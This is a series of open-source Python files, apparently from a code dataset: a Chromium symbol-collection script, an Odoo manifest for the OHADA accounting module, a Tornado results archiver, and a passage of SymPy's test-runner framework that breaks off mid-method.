#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import hashlib import json import logging import os import re import shutil import subprocess import sys import tempfile from proc_maps import ProcMaps BASE_PATH = os.path.dirname(os.path.abspath(__file__)) REDUCE_DEBUGLINE_PATH = os.path.join(BASE_PATH, 'reduce_debugline.py') LOGGER = logging.getLogger('prepare_symbol_info') def _dump_command_result(command, output_dir_path, basename, suffix): handle_out, filename_out = tempfile.mkstemp( suffix=suffix, prefix=basename + '.', dir=output_dir_path) handle_err, filename_err = tempfile.mkstemp( suffix=suffix + '.err', prefix=basename + '.', dir=output_dir_path) error = False try: subprocess.check_call( command, stdout=handle_out, stderr=handle_err, shell=True) except (OSError, subprocess.CalledProcessError): error = True finally: os.close(handle_err) os.close(handle_out) if os.path.exists(filename_err): if LOGGER.getEffectiveLevel() <= logging.DEBUG: with open(filename_err, 'r') as f: for line in f: LOGGER.debug(line.rstrip()) os.remove(filename_err) if os.path.exists(filename_out) and ( os.path.getsize(filename_out) == 0 or error): os.remove(filename_out) return None if not os.path.exists(filename_out): return None return filename_out def prepare_symbol_info(maps_path, output_dir_path=None, alternative_dirs=None, use_tempdir=False, use_source_file_name=False): """Prepares (collects) symbol information files for find_runtime_symbols. 1) If |output_dir_path| is specified, it tries collecting symbol information files in the given directory |output_dir_path|. 1-a) If |output_dir_path| doesn't exist, create the directory and use it. 1-b) If |output_dir_path| is an empty directory, use it. 1-c) If |output_dir_path| is a directory which has 'files.json', assumes that files are already collected and just ignores it. 1-d) Otherwise, depends on |use_tempdir|. 2) If |output_dir_path| is not specified, it tries to create a new directory depending on 'maps_path'. If it cannot create a new directory, creates a temporary directory depending on |use_tempdir|. If |use_tempdir| is False, returns None. Args: maps_path: A path to a file which contains '/proc/<pid>/maps'. alternative_dirs: A mapping from a directory '/path/on/target' where the target process runs to a directory '/path/on/host' where the script reads the binary. Considered to be used for Android binaries. output_dir_path: A path to a directory where files are prepared. use_tempdir: If True, it creates a temporary directory when it cannot create a new directory. use_source_file_name: If True, it adds reduced result of 'readelf -wL' to find source file names. Returns: A pair of a path to the prepared directory and a boolean representing if it created a temporary directory or not. """ alternative_dirs = alternative_dirs or {} if not output_dir_path: matched = re.match('^(.*)\.maps$', os.path.basename(maps_path)) if matched: output_dir_path = matched.group(1) + '.pre' if not output_dir_path: matched = re.match('^/proc/(.*)/maps$', os.path.realpath(maps_path)) if matched: output_dir_path = matched.group(1) + '.pre' if not output_dir_path: output_dir_path = os.path.basename(maps_path) + '.pre' # TODO(dmikurube): Find another candidate for output_dir_path. used_tempdir = False LOGGER.info('Data for profiling will be collected in "%s".' % output_dir_path) if os.path.exists(output_dir_path): if os.path.isdir(output_dir_path) and not os.listdir(output_dir_path): LOGGER.warn('Using an empty existing directory "%s".' % output_dir_path) else: LOGGER.warn('A file or a directory exists at "%s".' % output_dir_path) if os.path.exists(os.path.join(output_dir_path, 'files.json')): LOGGER.warn('Using the existing directory "%s".' % output_dir_path) return output_dir_path, used_tempdir else: if use_tempdir: output_dir_path = tempfile.mkdtemp() used_tempdir = True LOGGER.warn('Using a temporary directory "%s".' % output_dir_path) else: LOGGER.warn('The directory "%s" is not available.' % output_dir_path) return None, used_tempdir else: LOGGER.info('Creating a new directory "%s".' % output_dir_path) try: os.mkdir(output_dir_path) except OSError: LOGGER.warn('A directory "%s" cannot be created.' % output_dir_path) if use_tempdir: output_dir_path = tempfile.mkdtemp() used_tempdir = True LOGGER.warn('Using a temporary directory "%s".' % output_dir_path) else: LOGGER.warn('The directory "%s" is not available.' % output_dir_path) return None, used_tempdir shutil.copyfile(maps_path, os.path.join(output_dir_path, 'maps')) with open(maps_path, mode='r') as f: maps = ProcMaps.load(f) LOGGER.debug('Listing up symbols.') files = {} for entry in maps.iter(ProcMaps.executable): LOGGER.debug(' %016x-%016x +%06x %s' % ( entry.begin, entry.end, entry.offset, entry.name)) binary_path = entry.name for target_path, host_path in alternative_dirs.iteritems(): if entry.name.startswith(target_path): binary_path = entry.name.replace(target_path, host_path, 1) nm_filename = _dump_command_result( 'nm -n --format bsd %s | c++filt' % binary_path, output_dir_path, os.path.basename(binary_path), '.nm') if not nm_filename: continue readelf_e_filename = _dump_command_result( 'readelf -eW %s' % binary_path, output_dir_path, os.path.basename(binary_path), '.readelf-e') if not readelf_e_filename: continue readelf_debug_decodedline_file = None if use_source_file_name: readelf_debug_decodedline_file = _dump_command_result( 'readelf -wL %s | %s' % (binary_path, REDUCE_DEBUGLINE_PATH), output_dir_path, os.path.basename(binary_path), '.readelf-wL') files[entry.name] = {} files[entry.name]['nm'] = { 'file': os.path.basename(nm_filename), 'format': 'bsd', 'mangled': False} files[entry.name]['readelf-e'] = { 'file': os.path.basename(readelf_e_filename)} if readelf_debug_decodedline_file: files[entry.name]['readelf-debug-decodedline-file'] = { 'file': os.path.basename(readelf_debug_decodedline_file)} files[entry.name]['size'] = os.stat(binary_path).st_size with open(binary_path, 'rb') as entry_f: md5 = hashlib.md5() sha1 = hashlib.sha1() chunk = entry_f.read(1024 * 1024) while chunk: md5.update(chunk) sha1.update(chunk) chunk = entry_f.read(1024 * 1024) files[entry.name]['sha1'] = sha1.hexdigest() files[entry.name]['md5'] = md5.hexdigest() with open(os.path.join(output_dir_path, 'files.json'), 'w') as f: json.dump(files, f, indent=2, sort_keys=True) LOGGER.info('Collected symbol information at "%s".' % output_dir_path) return output_dir_path, used_tempdir def main(): if not sys.platform.startswith('linux'): sys.stderr.write('This script work only on Linux.') return 1 LOGGER.setLevel(logging.DEBUG) handler = logging.StreamHandler() handler.setLevel(logging.INFO) formatter = logging.Formatter('%(message)s') handler.setFormatter(formatter) LOGGER.addHandler(handler) # TODO(dmikurube): Specify |alternative_dirs| from command line. if len(sys.argv) < 2: sys.stderr.write("""Usage: %s /path/to/maps [/path/to/output_data_dir/] """ % sys.argv[0]) return 1 elif len(sys.argv) == 2: result, _ = prepare_symbol_info(sys.argv[1]) else: result, _ = prepare_symbol_info(sys.argv[1], sys.argv[2]) return not result if __name__ == '__main__': sys.exit(main())
bsd-3-clause
hbrunn/OpenUpgrade
addons/l10n_syscohada/__openerp__.py
430
1940
# -*- coding: utf-8 -*- ############################################################################## # # Copyright (C) 2010-2011 BAAMTU SARL (<http://www.baamtu.sn>). # contact: [email protected] # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name' : 'OHADA - Accounting', 'version' : '1.0', 'author' : 'Baamtu Senegal', 'category' : 'Localization/Account Charts', 'description': """ This module implements the accounting chart for OHADA area. =========================================================== It allows any company or association to manage its financial accounting. Countries that use OHADA are the following: ------------------------------------------- Benin, Burkina Faso, Cameroon, Central African Republic, Comoros, Congo, Ivory Coast, Gabon, Guinea, Guinea Bissau, Equatorial Guinea, Mali, Niger, Replica of Democratic Congo, Senegal, Chad, Togo. """, 'website': 'http://www.baamtu.com', 'depends' : ['account', 'base_vat'], 'demo' : [], 'data' : ['l10n_syscohada_data.xml','l10n_syscohada_wizard.xml'], 'auto_install': False, 'installable': True } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
alipsgh/tornado
archiver/archiver.py
1
1542
""" The Tornado Framework By Ali Pesaranghader University of Ottawa, Ontario, Canada E-mail: apesaran -at- uottawa -dot- ca / alipsgh -at- gmail -dot- com """ import os import zipfile from os.path import basename class Archiver: """ This class stores results of experiments in .zip files for future reference! """ @staticmethod def archive_single(label, stats, dir_path, name, sub_name): file_path = (dir_path + name + "_" + sub_name).lower() stats_writer = open(file_path + ".txt", 'w') stats_writer.write(label + "\n") stats_writer.write(str(stats) + "\n") stats_writer.close() zipper = zipfile.ZipFile(file_path + ".zip", 'w') zipper.write(file_path + ".txt", compress_type=zipfile.ZIP_DEFLATED, arcname=basename(file_path + ".txt")) zipper.close() os.remove(file_path + ".txt") @staticmethod def archive_multiple(labels, stats, dir_path, name, sub_name): file_path = (dir_path + name + "_" + sub_name).lower() stats_writer = open(file_path + ".txt", 'w') for i in range(0, len(labels)): stats_writer.write(labels[i] + "\n") stats_writer.write(str(stats[i]) + "\n") stats_writer.close() zipper = zipfile.ZipFile(file_path + ".zip", 'w') zipper.write(file_path + ".txt", compress_type=zipfile.ZIP_DEFLATED, arcname=basename(file_path + ".txt")) zipper.close() os.remove(file_path + ".txt")
mit
devs1991/test_edx_docmode
venv/lib/python2.7/site-packages/sympy/utilities/runtests.py
3
46156
""" This is our testing framework. Goals: * it should be compatible with py.test and operate very similarly (or identically) * doesn't require any external dependencies * preferably all the functionality should be in this file only * no magic, just import the test file and execute the test functions, that's it * portable """ import os import sys import inspect import traceback import pdb import re import linecache from fnmatch import fnmatch from timeit import default_timer as clock import doctest as pdoctest # avoid clashing with our doctest() function from doctest import DocTestFinder, DocTestRunner import re as pre import random # Use sys.stdout encoding for ouput. # This was only added to Python's doctest in Python 2.6, so we must duplicate # it here to make utf8 files work in Python 2.5. pdoctest._encoding = getattr(sys.__stdout__, 'encoding', None) or 'utf-8' def _indent(s, indent=4): """ Add the given number of space characters to the beginning of every non-blank line in `s`, and return the result. If the string `s` is Unicode, it is encoded using the stdout encoding and the `backslashreplace` error handler. """ if isinstance(s, unicode): s = s.encode(pdoctest._encoding, 'backslashreplace') # This regexp matches the start of non-blank lines: return re.sub('(?m)^(?!$)', indent*' ', s) pdoctest._indent = _indent def sys_normcase(f): if sys_case_insensitive: return f.lower() return f def convert_to_native_paths(lst): """ Converts a list of '/' separated paths into a list of native (os.sep separated) paths and converts to lowercase if the system is case insensitive. """ newlst = [] for i, rv in enumerate(lst): rv = os.path.join(*rv.split("/")) # on windows the slash after the colon is dropped if sys.platform == "win32": pos = rv.find(':') if pos != -1: if rv[pos+1] != '\\': rv = rv[:pos+1] + '\\' + rv[pos+1:] newlst.append(sys_normcase(rv)) return newlst def get_sympy_dir(): """ Returns the root sympy directory and set the global value indicating whether the system is case sensitive or not. """ global sys_case_insensitive this_file = os.path.abspath(__file__) sympy_dir = os.path.join(os.path.dirname(this_file), "..", "..") sympy_dir = os.path.normpath(sympy_dir) sys_case_insensitive = (os.path.isdir(sympy_dir) and os.path.isdir(sympy_dir.lower()) and os.path.isdir(sympy_dir.upper())) return sys_normcase(sympy_dir) def isgeneratorfunction(object): """ Return true if the object is a user-defined generator function. Generator function objects provides same attributes as functions. See isfunction.__doc__ for attributes listing. Adapted from Python 2.6. """ CO_GENERATOR = 0x20 if (inspect.isfunction(object) or inspect.ismethod(object)) and \ object.func_code.co_flags & CO_GENERATOR: return True return False def setup_pprint(): from sympy import pprint_use_unicode, init_printing # force pprint to be in ascii mode in doctests pprint_use_unicode(False) # hook our nice, hash-stable strprinter init_printing(pretty_print=False) def test(*paths, **kwargs): """ Run all tests in test_*.py files which match any of the given strings in `paths` or all tests if paths=[]. Notes: o if sort=False, tests are run in random order (not default). o paths can be entered in native system format or in unix, forward-slash format. Examples: >> import sympy Run all tests: >> sympy.test() Run one file: >> sympy.test("sympy/core/tests/test_basic.py") >> sympy.test("_basic") Run all tests in sympy/functions/ and some particular file: >> sympy.test("sympy/core/tests/test_basic.py", "sympy/functions") Run all tests in sympy/core and sympy/utilities: >> sympy.test("/core", "/util") Run specific test from a file: >> sympy.test("sympy/core/tests/test_basic.py", kw="test_equality") Run the tests with verbose mode on: >> sympy.test(verbose=True) Don't sort the test output: >> sympy.test(sort=False) Turn on post-mortem pdb: >> sympy.test(pdb=True) Turn off colors: >> sympy.test(colors=False) The traceback verboseness can be set to "short" or "no" (default is "short") >> sympy.test(tb='no') """ verbose = kwargs.get("verbose", False) tb = kwargs.get("tb", "short") kw = kwargs.get("kw", "") post_mortem = kwargs.get("pdb", False) colors = kwargs.get("colors", True) sort = kwargs.get("sort", True) seed = kwargs.get("seed", None) if seed is None: seed = random.randrange(100000000) r = PyTestReporter(verbose, tb, colors) t = SymPyTests(r, kw, post_mortem, seed) # Disable warnings for external modules import sympy.external sympy.external.importtools.WARN_OLD_VERSION = False sympy.external.importtools.WARN_NOT_INSTALLED = False test_files = t.get_test_files('sympy') if len(paths) == 0: t._testfiles.extend(test_files) else: paths = convert_to_native_paths(paths) matched = [] for f in test_files: basename = os.path.basename(f) for p in paths: if p in f or fnmatch(basename, p): matched.append(f) break t._testfiles.extend(matched) return t.test(sort=sort) def doctest(*paths, **kwargs): """ Runs doctests in all *py files in the sympy directory which match any of the given strings in `paths` or all tests if paths=[]. Note: o paths can be entered in native system format or in unix, forward-slash format. o files that are on the blacklist can be tested by providing their path; they are only excluded if no paths are given. Examples: >> import sympy Run all tests: >> sympy.doctest() Run one file: >> sympy.doctest("sympy/core/basic.py") >> sympy.doctest("polynomial.txt") Run all tests in sympy/functions/ and some particular file: >> sympy.doctest("/functions", "basic.py") Run any file having polynomial in its name, doc/src/modules/polynomial.txt, sympy\functions\special\polynomials.py, and sympy\polys\polynomial.py: >> sympy.doctest("polynomial") """ normal = kwargs.get("normal", False) verbose = kwargs.get("verbose", False) blacklist = kwargs.get("blacklist", []) blacklist.extend([ "doc/src/modules/mpmath", # needs to be fixed upstream "sympy/mpmath", # needs to be fixed upstream "doc/src/modules/plotting.txt", # generates live plots "sympy/plotting", # generates live plots "sympy/utilities/compilef.py", # needs tcc "sympy/utilities/autowrap.py", # needs installed compiler "sympy/galgebra/GA.py", # needs numpy "sympy/galgebra/latex_ex.py", # needs numpy "sympy/conftest.py", # needs py.test "sympy/utilities/benchmarking.py", # needs py.test ]) blacklist = convert_to_native_paths(blacklist) # Disable warnings for external modules import sympy.external sympy.external.importtools.WARN_OLD_VERSION = False sympy.external.importtools.WARN_NOT_INSTALLED = False r = PyTestReporter(verbose) t = SymPyDocTests(r, normal) test_files = t.get_test_files('sympy') not_blacklisted = [f for f in test_files if not any(b in f for b in blacklist)] if len(paths) == 0: t._testfiles.extend(not_blacklisted) else: # take only what was requested...but not blacklisted items # and allow for partial match anywhere or fnmatch of name paths = convert_to_native_paths(paths) matched = [] for f in not_blacklisted: basename = os.path.basename(f) for p in paths: if p in f or fnmatch(basename, p): matched.append(f) break t._testfiles.extend(matched) # run the tests and record the result for this *py portion of the tests if t._testfiles: failed = not t.test() else: failed = False # test *txt files only if we are running python newer than 2.4 if sys.version_info[:2] > (2,4): # N.B. # -------------------------------------------------------------------- # Here we test *.txt files at or below doc/src. Code from these must # be self supporting in terms of imports since there is no importing # of necessary modules by doctest.testfile. If you try to pass *.py # files through this they might fail because they will lack the needed # imports and smarter parsing that can be done with source code. # test_files = t.get_test_files('doc/src', '*.txt', init_only=False) test_files.sort() not_blacklisted = [f for f in test_files if not any(b in f for b in blacklist)] if len(paths) == 0: matched = not_blacklisted else: # Take only what was requested as long as it's not on the blacklist. # Paths were already made native in *py tests so don't repeat here. # There's no chance of having a *py file slip through since we # only have *txt files in test_files. matched = [] for f in not_blacklisted: basename = os.path.basename(f) for p in paths: if p in f or fnmatch(basename, p): matched.append(f) break setup_pprint() first_report = True for txt_file in matched: if not os.path.isfile(txt_file): continue old_displayhook = sys.displayhook try: # out = pdoctest.testfile(txt_file, module_relative=False, encoding='utf-8', # optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE) out = sympytestfile(txt_file, module_relative=False, encoding='utf-8', optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE) finally: # make sure we return to the original displayhook in case some # doctest has changed that sys.displayhook = old_displayhook txtfailed, tested = out if tested: failed = txtfailed or failed if first_report: first_report = False msg = 'txt doctests start' lhead = '='*((80 - len(msg))//2 - 1) rhead = '='*(79 - len(msg) - len(lhead) - 1) print ' '.join([lhead, msg, rhead]) print # use as the id, everything past the first 'sympy' file_id = txt_file[txt_file.find('sympy') + len('sympy') + 1:] print file_id, # get at least the name out so it is know who is being tested wid = 80 - len(file_id) - 1 #update width test_file = '[%s]' % (tested) report = '[%s]' % (txtfailed or 'OK') print ''.join([test_file,' '*(wid-len(test_file)-len(report)), report]) # the doctests for *py will have printed this message already if there was # a failure, so now only print it if there was intervening reporting by # testing the *txt as evidenced by first_report no longer being True. if not first_report and failed: print print("DO *NOT* COMMIT!") return not failed # The Python 2.5 doctest runner uses a tuple, but in 2.6+, it uses a namedtuple # (which doesn't exist in 2.5-) if sys.version_info[:2] > (2,5): from collections import namedtuple SymPyTestResults = namedtuple('TestResults', 'failed attempted') else: SymPyTestResults = lambda a, b: (a, b) def sympytestfile(filename, module_relative=True, name=None, package=None, globs=None, verbose=None, report=True, optionflags=0, extraglobs=None, raise_on_error=False, parser=pdoctest.DocTestParser(), encoding=None): """ Test examples in the given file. Return (#failures, #tests). Optional keyword arg "module_relative" specifies how filenames should be interpreted: - If "module_relative" is True (the default), then "filename" specifies a module-relative path. By default, this path is relative to the calling module's directory; but if the "package" argument is specified, then it is relative to that package. To ensure os-independence, "filename" should use "/" characters to separate path segments, and should not be an absolute path (i.e., it may not begin with "/"). - If "module_relative" is False, then "filename" specifies an os-specific path. The path may be absolute or relative (to the current working directory). Optional keyword arg "name" gives the name of the test; by default use the file's basename. Optional keyword argument "package" is a Python package or the name of a Python package whose directory should be used as the base directory for a module relative filename. If no package is specified, then the calling module's directory is used as the base directory for module relative filenames. It is an error to specify "package" if "module_relative" is False. Optional keyword arg "globs" gives a dict to be used as the globals when executing examples; by default, use {}. A copy of this dict is actually used for each docstring, so that each docstring's examples start with a clean slate. Optional keyword arg "extraglobs" gives a dictionary that should be merged into the globals that are used to execute examples. By default, no extra globals are used. Optional keyword arg "verbose" prints lots of stuff if true, prints only failures if false; by default, it's true iff "-v" is in sys.argv. Optional keyword arg "report" prints a summary at the end when true, else prints nothing at the end. In verbose mode, the summary is detailed, else very brief (in fact, empty if all tests passed). Optional keyword arg "optionflags" or's together module constants, and defaults to 0. Possible values (see the docs for details): DONT_ACCEPT_TRUE_FOR_1 DONT_ACCEPT_BLANKLINE NORMALIZE_WHITESPACE ELLIPSIS SKIP IGNORE_EXCEPTION_DETAIL REPORT_UDIFF REPORT_CDIFF REPORT_NDIFF REPORT_ONLY_FIRST_FAILURE Optional keyword arg "raise_on_error" raises an exception on the first unexpected exception or failure. This allows failures to be post-mortem debugged. Optional keyword arg "parser" specifies a DocTestParser (or subclass) that should be used to extract tests from the files. Optional keyword arg "encoding" specifies an encoding that should be used to convert the file to unicode. Advanced tomfoolery: testmod runs methods of a local instance of class doctest.Tester, then merges the results into (or creates) global Tester instance doctest.master. Methods of doctest.master can be called directly too, if you want to do something unusual. Passing report=0 to testmod is especially useful then, to delay displaying a summary. Invoke doctest.master.summarize(verbose) when you're done fiddling. """ if package and not module_relative: raise ValueError("Package may only be specified for module-" "relative paths.") # Relativize the path text, filename = pdoctest._load_testfile(filename, package, module_relative) # If no name was given, then use the file's name. if name is None: name = os.path.basename(filename) # Assemble the globals. if globs is None: globs = {} else: globs = globs.copy() if extraglobs is not None: globs.update(extraglobs) if '__name__' not in globs: globs['__name__'] = '__main__' if raise_on_error: runner = pdoctest.DebugRunner(verbose=verbose, optionflags=optionflags) else: runner = SymPyDocTestRunner(verbose=verbose, optionflags=optionflags) if encoding is not None: text = text.decode(encoding) # Read the file, convert it to a test, and run it. test = parser.get_doctest(text, globs, name, filename, 0) runner.run(test) if report: runner.summarize() if pdoctest.master is None: pdoctest.master = runner else: pdoctest.master.merge(runner) return SymPyTestResults(runner.failures, runner.tries) class SymPyTests(object): def __init__(self, reporter, kw="", post_mortem=False, seed=random.random()): self._post_mortem = post_mortem self._kw = kw self._count = 0 self._root_dir = sympy_dir self._reporter = reporter self._reporter.root_dir(self._root_dir) self._testfiles = [] self._seed = seed def test(self, sort=False): """ Runs the tests returning True if all tests pass, otherwise False. If sort=False run tests in random order. """ if sort: self._testfiles.sort() else: from random import shuffle random.seed(self._seed) shuffle(self._testfiles) self._reporter.start(self._seed) for f in self._testfiles: try: self.test_file(f) except KeyboardInterrupt: print " interrupted by user" break return self._reporter.finish() def test_file(self, filename): name = "test%d" % self._count name = os.path.splitext(os.path.basename(filename))[0] self._count += 1 gl = {'__file__':filename} random.seed(self._seed) try: execfile(filename, gl) except (ImportError, SyntaxError): self._reporter.import_error(filename, sys.exc_info()) return pytestfile = "" if "XFAIL" in gl: pytestfile = inspect.getsourcefile(gl["XFAIL"]) disabled = gl.get("disabled", False) if disabled: funcs = [] else: # we need to filter only those functions that begin with 'test_' # that are defined in the testing file or in the file where # is defined the XFAIL decorator funcs = [gl[f] for f in gl.keys() if f.startswith("test_") and (inspect.isfunction(gl[f]) or inspect.ismethod(gl[f])) and (inspect.getsourcefile(gl[f]) == filename or inspect.getsourcefile(gl[f]) == pytestfile)] # Sorting of XFAILed functions isn't fixed yet :-( funcs.sort(key=lambda x: inspect.getsourcelines(x)[1]) i = 0 while i < len(funcs): if isgeneratorfunction(funcs[i]): # some tests can be generators, that return the actual # test functions. We unpack it below: f = funcs.pop(i) for fg in f(): func = fg[0] args = fg[1:] fgw = lambda: func(*args) funcs.insert(i, fgw) i += 1 else: i += 1 # drop functions that are not selected with the keyword expression: funcs = [x for x in funcs if self.matches(x)] if not funcs: return self._reporter.entering_filename(filename, len(funcs)) for f in funcs: self._reporter.entering_test(f) try: f() except KeyboardInterrupt: raise except: t, v, tr = sys.exc_info() if t is AssertionError: self._reporter.test_fail((t, v, tr)) if self._post_mortem: pdb.post_mortem(tr) elif t.__name__ == "Skipped": self._reporter.test_skip(v) elif t.__name__ == "XFail": self._reporter.test_xfail() elif t.__name__ == "XPass": self._reporter.test_xpass(v) else: self._reporter.test_exception((t, v, tr)) if self._post_mortem: pdb.post_mortem(tr) else: self._reporter.test_pass() self._reporter.leaving_filename() def matches(self, x): """ Does the keyword expression self._kw match "x"? Returns True/False. Always returns True if self._kw is "". """ if self._kw == "": return True return x.__name__.find(self._kw) != -1 def get_test_files(self, dir, pat = 'test_*.py'): """ Returns the list of test_*.py (default) files at or below directory `dir` relative to the sympy home directory. """ dir = os.path.join(self._root_dir, convert_to_native_paths([dir])[0]) g = [] for path, folders, files in os.walk(dir): g.extend([os.path.join(path, f) for f in files if fnmatch(f, pat)]) return [sys_normcase(gi) for gi in g] class SymPyDocTests(object): def __init__(self, reporter, normal): self._count = 0 self._root_dir = sympy_dir self._reporter = reporter self._reporter.root_dir(self._root_dir) self._normal = normal self._testfiles = [] def test(self): """ Runs the tests and returns True if all tests pass, otherwise False. """ self._reporter.start() for f in self._testfiles: try: self.test_file(f) except KeyboardInterrupt: print " interrupted by user" break return self._reporter.finish() def test_file(self, filename): import unittest from StringIO import StringIO rel_name = filename[len(self._root_dir)+1:] module = rel_name.replace(os.sep, '.')[:-3] setup_pprint() try: module = pdoctest._normalize_module(module) tests = SymPyDocTestFinder().find(module) except: self._reporter.import_error(filename, sys.exc_info()) return tests = [test for test in tests if len(test.examples) > 0] # By default (except for python 2.4 in which it was broken) tests # are sorted by alphabetical order by function name. We sort by line number # so one can edit the file sequentially from bottom to top...HOWEVER # if there are decorated functions, their line numbers will be too large # and for now one must just search for these by text and function name. tests.sort(key=lambda x: -x.lineno) if not tests: return self._reporter.entering_filename(filename, len(tests)) for test in tests: assert len(test.examples) != 0 runner = SymPyDocTestRunner(optionflags=pdoctest.ELLIPSIS | \ pdoctest.NORMALIZE_WHITESPACE) old = sys.stdout new = StringIO() sys.stdout = new # If the testing is normal, the doctests get importing magic to # provide the global namespace. If not normal (the default) then # then must run on their own; all imports must be explicit within # a function's docstring. Once imported that import will be # available to the rest of the tests in a given function's # docstring (unless clear_globs=True below). if not self._normal: test.globs = {} # if this is uncommented then all the test would get is what # comes by default with a "from sympy import *" #exec('from sympy import *') in test.globs try: f, t = runner.run(test, out=new.write, clear_globs=False) finally: sys.stdout = old if f > 0: self._reporter.doctest_fail(test.name, new.getvalue()) else: self._reporter.test_pass() self._reporter.leaving_filename() def get_test_files(self, dir, pat='*.py', init_only=True): """ Returns the list of *py files (default) from which docstrings will be tested which are at or below directory `dir`. By default, only those that have an __init__.py in their parent directory and do not start with `test_` will be included. """ def importable(x): """ Checks if given pathname x is an importable module by checking for __init__.py file. Returns True/False. Currently we only test if the __init__.py file exists in the directory with the file "x" (in theory we should also test all the parent dirs). """ init_py = os.path.join(os.path.dirname(x), "__init__.py") return os.path.exists(init_py) dir = os.path.join(self._root_dir, convert_to_native_paths([dir])[0]) g = [] for path, folders, files in os.walk(dir): g.extend([os.path.join(path, f) for f in files if not f.startswith('test_') and fnmatch(f, pat)]) if init_only: # skip files that are not importable (i.e. missing __init__.py) g = [x for x in g if importable(x)] return [sys_normcase(gi) for gi in g] class SymPyDocTestFinder(DocTestFinder): """ A class used to extract the DocTests that are relevant to a given object, from its docstring and the docstrings of its contained objects. Doctests can currently be extracted from the following object types: modules, functions, classes, methods, staticmethods, classmethods, and properties. Modified from doctest's version by looking harder for code in the case that it looks like the the code comes from a different module. In the case of decorated functions (e.g. @vectorize) they appear to come from a different module (e.g. multidemensional) even though their code is not there. """ def _find(self, tests, obj, name, module, source_lines, globs, seen): """ Find tests for the given object and any contained objects, and add them to `tests`. """ if self._verbose: print 'Finding tests in %s' % name # If we've already processed this object, then ignore it. if id(obj) in seen: return seen[id(obj)] = 1 # Make sure we don't run doctests for classes outside of sympy, such # as in numpy or scipy. if inspect.isclass(obj): if obj.__module__.split('.')[0] != 'sympy': return # Find a test for this object, and add it to the list of tests. test = self._get_test(obj, name, module, globs, source_lines) if test is not None: tests.append(test) # Look for tests in a module's contained objects. if inspect.ismodule(obj) and self._recurse: for rawname, val in obj.__dict__.items(): # Recurse to functions & classes. if inspect.isfunction(val) or inspect.isclass(val): in_module = self._from_module(module, val) if not in_module: # double check in case this function is decorated # and just appears to come from a different module. pat = r'\s*(def|class)\s+%s\s*\(' % rawname PAT = pre.compile(pat) in_module = any(PAT.match(line) for line in source_lines) if in_module: try: valname = '%s.%s' % (name, rawname) self._find(tests, val, valname, module, source_lines, globs, seen) except ValueError, msg: raise except: pass # Look for tests in a module's __test__ dictionary. if inspect.ismodule(obj) and self._recurse: for valname, val in getattr(obj, '__test__', {}).items(): if not isinstance(valname, basestring): raise ValueError("SymPyDocTestFinder.find: __test__ keys " "must be strings: %r" % (type(valname),)) if not (inspect.isfunction(val) or inspect.isclass(val) or inspect.ismethod(val) or inspect.ismodule(val) or isinstance(val, basestring)): raise ValueError("SymPyDocTestFinder.find: __test__ values " "must be strings, functions, methods, " "classes, or modules: %r" % (type(val),)) valname = '%s.__test__.%s' % (name, valname) self._find(tests, val, valname, module, source_lines, globs, seen) # Look for tests in a class's contained objects. if inspect.isclass(obj) and self._recurse: for valname, val in obj.__dict__.items(): # Special handling for staticmethod/classmethod. if isinstance(val, staticmethod): val = getattr(obj, valname) if isinstance(val, classmethod): val = getattr(obj, valname).im_func # Recurse to methods, properties, and nested classes. if (inspect.isfunction(val) or inspect.isclass(val) or isinstance(val, property)): in_module = self._from_module(module, val) if not in_module: # "double check" again pat = r'\s*(def|class)\s+%s\s*\(' % valname PAT = pre.compile(pat) in_module = any(PAT.match(line) for line in source_lines) if in_module: valname = '%s.%s' % (name, valname) self._find(tests, val, valname, module, source_lines, globs, seen) def _get_test(self, obj, name, module, globs, source_lines): """ Return a DocTest for the given object, if it defines a docstring; otherwise, return None. """ # Extract the object's docstring. If it doesn't have one, # then return None (no test for this object). if isinstance(obj, basestring): docstring = obj else: try: if obj.__doc__ is None: docstring = '' else: docstring = obj.__doc__ if not isinstance(docstring, basestring): docstring = str(docstring) except (TypeError, AttributeError): docstring = '' # Find the docstring's location in the file. lineno = self._find_lineno(obj, source_lines) if lineno is None: # if None, then _find_lineno couldn't find the docstring. # But IT IS STILL THERE. Likely it was decorated or something # (i.e., @property docstrings have lineno == None) # TODO: Write our own _find_lineno that is smarter in this regard # Until then, just give it a dummy lineno. This is just used for # sorting the tests, so the only bad effect is that they will appear # last instead of the order that they really are in the file. # lineno is also used to report the offending line of a failing # doctest, which is another reason to fix this. See issue 1947. lineno = 0 # Don't bother if the docstring is empty. if self._exclude_empty and not docstring: return None # Return a DocTest for this object. if module is None: filename = None else: filename = getattr(module, '__file__', module.__name__) if filename[-4:] in (".pyc", ".pyo"): filename = filename[:-1] return self._parser.get_doctest(docstring, globs, name, filename, lineno) class SymPyDocTestRunner(DocTestRunner): """ A class used to run DocTest test cases, and accumulate statistics. The `run` method is used to process a single DocTest case. It returns a tuple `(f, t)`, where `t` is the number of test cases tried, and `f` is the number of test cases that failed. Modified from the doctest version to not reset the sys.displayhook (see issue 2041). See the docstring of the original DocTestRunner for more information. """ def run(self, test, compileflags=None, out=None, clear_globs=True): """ Run the examples in `test`, and display the results using the writer function `out`. The examples are run in the namespace `test.globs`. If `clear_globs` is true (the default), then this namespace will be cleared after the test runs, to help with garbage collection. If you would like to examine the namespace after the test completes, then use `clear_globs=False`. `compileflags` gives the set of flags that should be used by the Python compiler when running the examples. If not specified, then it will default to the set of future-import flags that apply to `globs`. The output of each example is checked using `SymPyDocTestRunner.check_output`, and the results are formatted by the `SymPyDocTestRunner.report_*` methods. """ self.test = test if compileflags is None: compileflags = pdoctest._extract_future_flags(test.globs) save_stdout = sys.stdout if out is None: out = save_stdout.write sys.stdout = self._fakeout # Patch pdb.set_trace to restore sys.stdout during interactive # debugging (so it's not still redirected to self._fakeout). # Note that the interactive output will go to *our* # save_stdout, even if that's not the real sys.stdout; this # allows us to write test cases for the set_trace behavior. 